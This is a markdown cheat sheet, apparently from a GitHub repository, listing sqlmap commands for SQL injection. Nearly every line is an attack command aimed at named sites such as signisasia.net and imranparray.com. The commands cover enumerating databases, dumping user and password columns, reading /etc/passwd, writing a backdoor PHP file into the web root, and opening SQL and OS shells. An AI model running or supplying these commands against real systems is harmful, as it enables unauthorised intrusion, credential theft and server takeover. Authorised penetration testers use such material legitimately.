Skip to content

sqlmap.md

Latest commit

 

History

History
170 lines (107 loc) · 3.13 KB

sqlmap.md

File metadata and controls

170 lines (107 loc) · 3.13 KB

SqlMap Quick CheatSheet

URL WRITING

Single URL

sqlmap -u http://signisasia.net/books/view?id=1 --dbs

Input Request in File

  • Capture the request with httpheader,burpsuite
  • Save it to req.txt
sqlmap -r request.txt

Input Request in File(Test only username parameter)

  • Capture the request with httpheader,burpsuite
  • Save it to req.txt
sqlmap -r req.txt -p username

Testing a pattern of URL's

  • If we have test for a URL scheme injection like
http://signisasia.net/books/1/view
http://signisasia.net/books/2/view
http://signisasia.net/books/3/view
  • The following URL's can be used to test all the URL's
sqlmap -u http://signisasia.net/books/*/view --dbs

[Post injection Direcltly]

sqlmap -u http://imranparray.com/login.php --data "username=imx&pass=imx100&submit=Submit" -p username

> --data is the post data send in the request
> -p is the injection point.

Using Cookies

sqlmap -u http://imranparray.com/welcom.php --cookie="PHPSESSID=adsaasd56454a6s54d54" -u http://imranparray.com/welcome/functionality.php?id=100

Scanning multiple targets

sqlmap -m urls.txt -dbs --batch'

Exploitation

Extract Databases

sqlmap -u http://signisasia.net/becomemember.php?id=14 --dbs

Extract Tables from database

sqlmap -u http://signisasia.net/becomemember.php?id=14 -D database --tables

Extract Columns of table_name from database

sqlmap -u http://signisasia.net/becomemember.php?id=14 -D database -T table_name --columns

Dumping Data

sqlmap -u http://signisasia.net/becomemember.php?id=14 -D database -T table_name -C colum1,column2,clumn3 --dump

Speeding Up The process

Multithreading

sqlmap -u http://signisasia.net/books/view.php?id=100 --dbs --threads 5

Null-Connection

sqlmap -u http://signisasia.net/books/view.php?id=100 --dbs --null-connection

HTTP Persistant Connection

sqlmap -u http://signisasia.net/books/view.php?id=100 --dbs --keep-alive

Output prediction

sqlmap -u http://signisasia.net/books/view.php?id=100 -D database -T user -c users,password --dump --predict-output

File Privileges

[Checking privilages]

sqlmap -u http://signisasia.net/books/view.php?id=100 --privileges

Reading Files from the server

sqlmap -u http://signisasia.net/books/view.php?id=100 --file-read=/etc/passwd

Uploading Files/Shell

sqlmap -u http://signisasia.net/books/view.php?id=100 --file-write=/root/imxx/backdoor.php --file-dest=/var/www/imran.php

Getting Shells

Sql Shell

sqlmap -u http://imranparray.com/login.php?id=100 --sql-shell

OS shell

sqlmap -u http://imranparray.com/login.php?id=100 --os-shell

Os Command Exe without Shell Upload

sqlmap -u http://imranparray.com/login.php?id=100 --os-cmd "uname -a"

Using Proxy

sqlmap --proxy="127.0.0.1:8888" -u https://imranparray.com/home.php?id=12 --dbs